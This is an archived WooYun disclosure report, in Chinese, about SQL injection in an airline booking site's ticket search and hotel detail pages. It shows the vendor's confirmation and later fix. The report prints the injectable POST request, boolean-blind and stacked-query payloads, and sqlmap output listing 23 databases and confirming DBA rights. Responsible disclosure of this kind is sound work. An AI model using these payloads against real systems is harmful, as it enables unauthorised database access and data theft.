乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-26: 厂商已经确认,细节仅向厂商公开 2015-12-06: 细节向核心白帽子及相关领域专家公开 2015-12-16: 细节向普通白帽子公开 2015-12-26: 细节向实习白帽子公开 2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开
rt
注入点在查询机票的地方post包
POST /timetable/schedules.asp HTTP/1.1Host: **.**.**.**:8084User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**:8084/timetable/schedules.aspCookie: ASPSESSIONIDCQQBQQDA=MPNNGOFDMHAAFPJJDBKFIPBHConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 98Segment2=ONE_WAY&f_orig=TPE&f_dest=TPE&GoYY=2015&Gomm=Nov&Godd=20&BackYY=2015&Backmm=Nov&Backdd=20
数据
web server operating system: Windows Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005[16:26:54] [INFO] fetching current user[16:26:54] [WARNING] running in a single-thread mode. Please consider usageption '--threads' for faster data retrieval[16:26:54] [INFO] retrieved: guestusercurrent user: 'guestuser'
注入点
http://**.**.**.**:8084/holidays/hotel_detail.asp?route=mfm&seq=3
Place: GETParameter: seq Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: route=mfm&seq=3 AND 2663=2663 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: route=mfm&seq=3; WAITFOR DELAY '0:0:5';-----[15:58:16] [INFO] testing MySQL[15:58:16] [WARNING] the back-end DBMS is not MySQL[15:58:16] [INFO] testing Oracle[15:58:16] [WARNING] the back-end DBMS is not Oracle[15:58:16] [INFO] testing PostgreSQL[15:58:17] [WARNING] the back-end DBMS is not PostgreSQL[15:58:17] [INFO] testing Microsoft SQL Server[15:58:17] [INFO] confirming Microsoft SQL Server[15:58:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005[15:58:17] [INFO] fetching current user[15:58:17] [WARNING] running in a single-thread mode. Please consider usaption '--threads' for faster data retrieval[15:58:17] [INFO] retrieved: guestusercurrent user: 'guestuser'
布尔型注入,涉及23裤
available databases [23]:[*] cn_web[*] ctu_Web[*] hgh_Web[*] master[*] mo_web[*] model[*] msdb[*] nkg_Web[*] pek_Web[*] pvg_Web[*] ReportServer[*] ReportServerTempDB[*] s_airmacau[*] szx_Web[*] tempdb[*] tpe_web[*] tw_amh[*] tw_web[*] tw_web_event[*] tw_web_internal[*] tw_web_outstation[*] tw_web_telex[*] xmn_Web
dba权限
[16:15:18] [INFO] the back-end DBMS is Microsoft SQLweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP, Microsoftback-end DBMS: Microsoft SQL Server 2005[16:15:18] [INFO] testing if current user is DBA[16:15:18] [WARNING] running in a single-thread modeption '--threads' for faster data retrieval[16:15:18] [INFO] retrieved: 1current user is DBA: 'True'
危害等级:高
漏洞Rank:18
确认时间:2015-11-26 18:11
感謝通報
2016-01-05:確認修復